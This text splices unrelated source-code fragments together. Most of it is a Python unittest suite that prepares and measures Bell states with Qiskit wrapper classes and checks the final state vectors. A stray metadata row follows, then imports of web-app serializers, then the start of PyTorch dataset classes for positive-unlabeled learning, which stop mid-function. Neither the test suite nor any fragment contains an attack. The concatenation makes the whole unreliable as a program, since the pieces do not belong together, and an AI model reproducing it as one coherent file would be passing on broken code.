# 4) Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩),
# by inverting the Quantum Circuit of Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_and_measure_bell_state_phi_minus_11(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Quantum State |11⟩, by applying the Pauli-X Gate on both the 1st and 2nd Qubits
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_bell_state_phi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array_11 = array([(0. + 0.j),
(0. + 0.j),
(0. + 0.j),
(1. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array_11, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test Cases for preparing and measuring the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
class PrepareAndMeasureBellStatePsiPlusTests(unittest.TestCase):
# Test #1 for preparing and measuring the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Preparation of the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
# 3) Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_and_measure_bell_state_psi_plus_00(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_bell_state_psi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array_00 = array([(1. + 0.j),
(0. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array_00, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #2 for preparing and measuring the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit;
# 3) Preparation of the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
# 4) Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_and_measure_bell_state_psi_plus_01(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
# Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_bell_state_psi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array_01 = array([(0. + 0.j),
(1. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array_01, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #3 for preparing and measuring the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit;
# 3) Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
# 4) Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩),
# by inverting the Quantum Circuit of the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_and_measure_bell_state_psi_plus_10(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_bell_state_psi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array_10 = array([(0. + 0.j),
(0. + 0.j),
(1. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array_10, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for preparing and measuring the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |11⟩,
# by applying the Pauli-X Gate on both the 1st and 2nd Qubits;
# 3) Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
# 4) Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩),
# by inverting the Quantum Circuit of the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_and_measure_bell_state_psi_plus_11(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Quantum State |11⟩, by applying the Pauli-X Gate on both the 1st and 2nd Qubits
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_bell_state_psi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array_11 = array([(0. + 0.j),
(0. + 0.j),
(0. + 0.j),
(1. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array_11, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test Cases for preparing and measuring the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
class PrepareAndMeasureBellStatePsiMinusTests(unittest.TestCase):
# Test #1 for preparing and measuring the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
# 3) Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩),
# by inverting the Quantum Circuit of the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_and_measure_bell_state_psi_minus_00(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiminus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_bell_state_psi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array_00 = array([(1. + 0.j),
(0. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array_00, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #2 for preparing and measuring the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit;
# 3) Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
# 4) Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩),
# by inverting the Quantum Circuit of the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_and_measure_bell_state_psi_minus_01(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiminus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
# Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_bell_state_psi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array_01 = array([(0. + 0.j),
(1. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array_01, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #3 for preparing and measuring the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit;
# 3) Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
# 4) Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩),
# by inverting the Quantum Circuit of the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_and_measure_bell_state_psi_minus_10(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiminus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_bell_state_psi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array_10 = array([(0. + 0.j),
(0. + 0.j),
(1. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array_10, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for preparing and measuring the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |11⟩,
# by applying the Pauli-X Gate on both the 1st and 2nd Qubits;
# 3) Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
# 4) Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩),
# by inverting the Quantum Circuit of the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_and_measure_bell_state_psi_minus_11(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiminus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Quantum State |11⟩, by applying the Pauli-X Gate on both the 1st and 2nd Qubits
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_bell_state_psi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array_11 = array([(0. + 0.j),
(0. + 0.j),
(0. + 0.j),
(1. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State is prepared and measured
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array_11, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
if __name__ == '__main__':
# Test Cases for preparing the Bell States
bell_states_prepare_tests_suite = unittest.TestLoader().loadTestsFromTestCase(PrepareBellStateTests)
# Test Cases for preparing and measuring the Bell States
epr_pair_bell_states_phi_plus_prepare_and_measure_tests_suite = \
unittest.TestLoader().loadTestsFromTestCase(PrepareAndMeasureEPRPairBellStatePhiPlusTests)
bell_states_phi_minus_prepare_and_measure_tests_suite = \
unittest.TestLoader().loadTestsFromTestCase(PrepareAndMeasureBellStatePhiMinusTests)
bell_states_psi_plus_prepare_and_measure_tests_suite = \
unittest.TestLoader().loadTestsFromTestCase(PrepareAndMeasureBellStatePsiPlusTests)
bell_states_psi_minus_prepare_and_measure_tests_suite = \
unittest.TestLoader().loadTestsFromTestCase(PrepareAndMeasureBellStatePsiMinusTests)
# Create a global Test Suite with all the Test Cases established
all_test_cases = unittest.TestSuite([bell_states_prepare_tests_suite,
epr_pair_bell_states_phi_plus_prepare_and_measure_tests_suite,
bell_states_phi_minus_prepare_and_measure_tests_suite,
bell_states_psi_plus_prepare_and_measure_tests_suite,
bell_states_psi_minus_prepare_and_measure_tests_suite])
# Run the global Test Suite with a Text Test Runner
unittest.TextTestRunner(verbosity=2).run(all_test_cases)
] | 4 | 2018-12-22T23:56:47.000Z | 2021-07-31T11:00:54.000Z | from .signup_serializer import RegisterSerializer, SigupSerializer
from .ranking_serializer import RankingPlayerSerializer, RankingGuildSerializer
from .token_serializer import (
PasswordField,
TokenObtainBaseSerializer,
TokenObtainSerializer,
)
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
from torch.utils import data
import torchvision
import torchvision.transforms as transforms
import numpy as np
from PIL import Image
from data_helper import *
from model_helper import *
class PosData(torch.utils.data.Dataset):
def __init__(self, transform=None, target_transform=None, data=None, \
index=None, data_type=None):
self.transform = transform
self.target_transform = target_transform
self.data=data
self.targets = np.zeros(data.shape[0], dtype= np.int_)
self.data_type = data_type
self.index = index
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
index, img, target = self.index[idx], self.data[idx], self.targets[idx]
if self.data_type == 'cifar' :
img = Image.fromarray(img)
elif self.data_type =='mnist':
img = Image.fromarray(img, mode='L')
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return index, img, target
class UnlabelData(torch.utils.data.Dataset):
def __init__(self, transform=None, target_transform=None, pos_data=None, \
neg_data=None, index=None, data_type=None):
self.transform = transform
self.target_transform = target_transform
self.data=np.concatenate((pos_data, neg_data), axis=0)
self.true_targets = np.concatenate((np.zeros(pos_data.shape[0], dtype= np.int_), np.ones(neg_data.shape[0], dtype= np.int_)), axis=0)
self.targets = np.ones_like(self.true_targets, dtype= np.int_)
self.data_type = data_type
self.index = index
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
index, img, target, true_target = self.index[idx], self.data[idx], self.targets[idx], self.true_targets[idx]
if self.data_type == 'cifar' :
img = Image.fromarray(img)
elif self.data_type =='mnist':
img = Image.fromarray(img, mode='L')
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return index, img, target, true_target
def get_PUDataSplits(data_obj, pos_size, alpha, beta, data_type=None):
unlabel_size = int((1-beta)*pos_size/beta)
